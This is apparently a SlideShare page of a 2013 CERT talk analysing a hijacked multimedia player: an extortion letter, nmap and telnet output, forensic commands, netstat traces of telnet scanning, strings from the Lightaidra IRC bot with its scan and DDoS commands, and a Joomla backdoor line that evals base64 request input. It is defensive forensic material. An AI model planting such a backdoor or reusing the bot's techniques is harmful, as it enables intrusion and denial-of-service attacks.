Kdo najde bota?
tadej.hren@cert.si
HEK.SI
12.4.2013
Dear xxx friends,
I’m DarkRobinHood, me and my friends we live in the Internet environments.
Like my namesake used me to g...
$ nmap 89.xxx.xxx.xxx
Starting Nmap 5.00 ( http://nmap.org ) at
2012-10-18 13:27 CEST
Interesting ports on 89.xxx.xxx.xxx:...
$ telnet 89.xxx.xxx.xxx
Trying 89.xxx.xxx.xxx...
Connected to 89.xxx.xxx.xxx.
Escape character is '^]'.
Venus login: root
...
# find / -ctime -10 –print # ps –ef
# find / -mtime -5 –ls # lsof –np PID
# find / -amin -120 –print # lsof –ni TCP:22
# s...
# netstat -aen
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address Sta...
# ps aux
PID Uid VmSize Stat Command
PID Uid VmSize Stat Command
1 root 380 S init
2 root SWN [ksoftirqd/0]
3 root SW< [ev...
181 root 224 S ./RootApp DvdPlayer
182 root 224 S ./RootApp DvdPlayer
3191 root 184 S msx
3245 root 428 S inetd
24399 root...
# ls –lA /var/run
-rw-r--r-- 1 root root 45 Oct 16 10:37 .httpd_status
-rw-r--r-- 1 root root 5 Oct 18 11:08 .lightpid
-rw...
/tmp/etc # ftpput
BusyBox v1.1.3 (2010.09.07-08:50+0000) multi-call binary
Usage: ftpput [options] remote-host remote-file...
$ strings msx
...
PRIVMSG %s :[login] you are logged in, (%s).
PRIVMSG %s :[!login] sorry, wrong authenthication password!...
PRIVMSG %s :* *** Access Commands:
PRIVMSG %s :*
PRIVMSG %s :* .login <password> - login to bot's party-line
PRIVMSG %s :*...
HD Moore The Wild West, https://www.youtube.com/watch? v=b-uPh99whw4
$ ls –lA /var/log/httpd
total 42124
-rw-r----- 1 root adm 15761694 2013-02-27 14:17 access_log
-rw-r----- 1 root adm 23013...
184.168.27.120 - - [25/Feb/2013:16:56:07 +0100]
"POST /plugins/system/dvmessages/dvmessages.php
HTTP/1.1"
200 10 "-"
"Mozi...
<?php
defined( '_JEXEC' ) or
die(@eval(base64_decode($_REQUEST['c_id'])));
2013 Kdo najde bota
2013 Kdo najde bota
2013 Kdo najde bota
2013 Kdo najde bota
2013 Kdo najde bota
2013 Kdo najde bota
2013 Kdo najde bota
2013 Kdo najde bota
Upcoming SlideShare
Loading in...5
×

2013 Kdo najde bota

202

Published on

Analiza zlorabljenega multimedijskega predvajalnika

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
202
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
2
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

2013 Kdo najde bota

  1. 1. Kdo najde bota? tadej.hren@cert.si HEK.SI 12.4.2013
  2. 2. Dear xxx friends, I’m DarkRobinHood, me and my friends we live in the Internet environments. Like my namesake used me to give equity in this world, I don’t like to steal, perhaps I prefer to invite people like you that works in the financial and economic markets, in general on the freedom and democracy’s, coming to us. The increased taxes, your arrogance and your injustice way to take money from us, only to deceive people that you are doing a honest job, got my attention. I’d like to invite you, with kindness, to give 75BTC before 12:00(GMT+1) on 10/16/2012 to the next Bitcoin Address: 1k966rggo3h85URb5unrXexxxxxxxxxxxxxxx . This money is going to be used for our noble cause. If you don’t get my apeal we’ll find ourselves in a position to gap you, to kick you out of our country. Showing that I’m not talking nosense, even this night you will have a small taste of what it will happen to you. My honor doesn’t let me to abey you in such way, it should be a lesson for you of thinking before you do something. Sincerely, Dark Robin Hood
  3. 3. $ nmap 89.xxx.xxx.xxx Starting Nmap 5.00 ( http://nmap.org ) at 2012-10-18 13:27 CEST Interesting ports on 89.xxx.xxx.xxx: Not shown: 991 closed ports PORT STATE SERVICE 23/tcp open telnet 25/tcp filtered smtp 80/tcp open http 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 445/tcp filtered microsoft-ds 1025/tcp filtered NFS-or-IIS Nmap done: 1 IP address (1 host up) scanned in 1.26 seconds
  4. 4. $ telnet 89.xxx.xxx.xxx Trying 89.xxx.xxx.xxx... Connected to 89.xxx.xxx.xxx. Escape character is '^]'. Venus login: root warning: cannot change to home directory BusyBox v1.1.3 (2010.09.07-08:50+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. # uname -a Linux Venus 2.6.12.6-VENUS #323635 Tue Sep 7 16:49:31 CST 2010 mips unknown
  5. 5. # find / -ctime -10 –print # ps –ef # find / -mtime -5 –ls # lsof –np PID # find / -amin -120 –print # lsof –ni TCP:22 # stat somefile # pstree -aAp # cat .bash_history # last -i # crontab # file somefile.bin # ls –lAct # strings somefile.bin # ls –l /proc/PID/ # less /var/log/secure # chkrootkit # less /var/log/access.log # rkhunter # netstat -anpt
  6. 6. # netstat -aen Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN tcp 0 1 89.xxx.xxx.xxx:4229 165.91.24.5:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:1457 165.91.24.80:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:4935 165.91.24.22:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:2247 165.91.24.76:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:3836 165.91.24.42:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:3523 165.91.24.41:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:2127 165.91.24.60:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:5641 37.xx.xx.xx:65535 ESTABLISHED tcp 0 1 89.xxx.xxx.xxx:2580 165.91.24.126:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:2768 165.91.24.77:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:4224 165.91.24.39:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:1981 165.91.24.16:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:2496 165.91.24.110:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:2500 165.91.24.30:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:4526 165.91.24.70:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:2720 165.91.24.93:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:4865 165.91.24.4:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:3356 165.91.24.26:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:1659 165.91.24.1:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:1786 165.91.24.96:23 SYN_SENT tcp 0 1 89.xxx.xxx.xxx:1981 165.91.24.17:23 SYN_SENT
  7. 7. # ps aux PID Uid VmSize Stat Command PID Uid VmSize Stat Command 1 root 380 S init 2 root SWN [ksoftirqd/0] 3 root SW< [events/0] 4 root SW< [khelper] 5 root SW< [kthread] 6 root SW< [kblockd/0] 7 root SW [khubd] 8 root SW [rpc-1] 9 root SW [rpc-3] 10 root SW [pdflush] 11 root SW [pdflush] 13 root SW< [aio/0] 14 root SW< [cifsoplockd] 15 root SW< [cifsdnotifyd] 12 root SW [kswapd0] 16 root SW [eth0] 17 root SW [mtdblockd] 29 root 384 S init 30 root 384 S init
  8. 8. 181 root 224 S ./RootApp DvdPlayer 182 root 224 S ./RootApp DvdPlayer 3191 root 184 S msx 3245 root 428 S inetd 24399 root Z [msx] 25360 root 7780 R DvdPlayer -s power 25361 root 224 S ./RootApp DvdPlayer 25362 root 7780 S DvdPlayer -s power 25363 root 7780 S N DvdPlayer -s power 25364 root 7780 S N DvdPlayer -s power 25376 root 7780 S DvdPlayer -s power 25377 root 7780 S DvdPlayer -s power 25381 root 7780 S DvdPlayer -s power 25382 root 7780 S DvdPlayer -s power 25383 root 7780 S DvdPlayer -s power 25386 root 7780 S DvdPlayer -s power 25387 root 7780 S DvdPlayer -s power 25388 root 7780 S DvdPlayer -s power 25389 root 7780 S DvdPlayer -s power 25390 root 7780 S DvdPlayer -s power 25391 root 7780 S DvdPlayer -s power 25392 root 7780 S DvdPlayer -s power
  9. 9. # ls –lA /var/run -rw-r--r-- 1 root root 45 Oct 16 10:37 .httpd_status -rw-r--r-- 1 root root 5 Oct 18 11:08 .lightpid -rw-r--r-- 1 root root 0 Oct 18 11:08 .lightscan -rw-r--r-- 1 root root 22497 Oct 18 11:02 .scan.log -rw-r--r-- 1 root root 67 Oct 18 11:07 .stats -rwxr-xr-x 1 root root 203081 Oct 18 11:09 arm -rwxr-xr-x 1 root root 204284 Oct 17 16:23 ax -rw-r--r-- 1 root root 5 Oct 17 16:23 dhcp.pid -rw-r--r-- 1 root root 6 Oct 17 16:23 inetd.pid -rwxr-xr-x 1 root root 266266 Oct 18 11:09 mips -rwxr-xr-x 1 root root 266327 Oct 18 11:08 mipsel -rwxr-xr-x 1 root root 266294 Oct 17 16:23 msx -rwxr-xr-x 1 root root 266201 Oct 17 16:23 mx -rwxr-xr-x 1 root root 195648 Oct 18 11:09 ppc -rwxr-xr-x 1 root root 196947 Oct 17 16:23 px -rwxr-xr-x 1 root root 2211 Oct 18 11:07 run.chk -rwxr-xr-x 1 root root 180529 Oct 18 11:09 sh -rwxr-xr-x 1 root root 181348 Oct 17 16:23 sx -rwxr-xr-x 1 root root 48480 Oct 18 11:09 x86_32
  10. 10. /tmp/etc # ftpput BusyBox v1.1.3 (2010.09.07-08:50+0000) multi-call binary Usage: ftpput [options] remote-host remote-file local-file Store a local file on a remote machine via FTP. Options: -v, --verbose Verbose -u, --username Username to be used -p, --password Password to be used -P, --port Port number to be used
  11. 11. $ strings msx ... PRIVMSG %s :[login] you are logged in, (%s). PRIVMSG %s :[!login] sorry, wrong authenthication password! ... GET /n09230945.asp HTTP/1.0 Host: automation.whatismyip.com %d.%d.%*s.%*s ... xxxxxx.user32.com:65535 /var/run/.lightpid 0123456789abcdefghilmnopqrstuvzywkxABCDEFGHILMNOPQRSTUVZYWKX|:.*<>@_;: ,.-+*^?=)(|AB&%$D"!wkyxzvutsrqponmlihgfedcba~123456789FUCK #aidra ->%s %s %s PASS burruciaga123 NICK %s USER pwn localhost * :Lightaidra ;) TOPIC %s
  12. 12. PRIVMSG %s :* *** Access Commands: PRIVMSG %s :* PRIVMSG %s :* .login <password> - login to bot's party-line PRIVMSG %s :* .logout - logout from bot's party-line PRIVMSG %s :* *** Miscs Commands PRIVMSG %s :* .exec <commands> - execute a system command PRIVMSG %s :* .version - show the current version of bot PRIVMSG %s :* .status - show the status of bot PRIVMSG %s :* .help - show this help message PRIVMSG %s :* *** Scan Commands PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug PRIVMSG %s :* .stop - stop current operation (scan/dos) PRIVMSG %s :* *** DDos Commands: PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing, PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86 PRIVMSG %s :* .spoof <ip> - set the source address ip spoof PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation) PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation) PRIVMSG %s :* *** IRC Commands: PRIVMSG %s :* .setchan <channel> - set new master channel PRIVMSG %s :* .join <channel> <password> - join bot in selected room PRIVMSG %s :* .part <channel> - part bot from selected room PRIVMSG %s :* .quit - kill the current process PRIVMSG %s :* *** EOF
  13. 13. HD Moore The Wild West, https://www.youtube.com/watch? v=b-uPh99whw4
  14. 14. $ ls –lA /var/log/httpd total 42124 -rw-r----- 1 root adm 15761694 2013-02-27 14:17 access_log -rw-r----- 1 root adm 23013951 2013-02-24 01:16 access_log.1 -rw-r----- 1 root adm 1339351 2013-02-24 01:17 access_log.2.gz -rw-r----- 1 root adm 1412975 2013-02-17 01:17 access_log.3.gz -rw-r----- 1 root adm 1531839 2013-02-10 01:17 access_log.4.gz
  15. 15. 184.168.27.120 - - [25/Feb/2013:16:56:07 +0100] "POST /plugins/system/dvmessages/dvmessages.php HTTP/1.1" 200 10 "-" "Mozilla/5.0 Firefox/3.6.12"
  16. 16. <?php defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×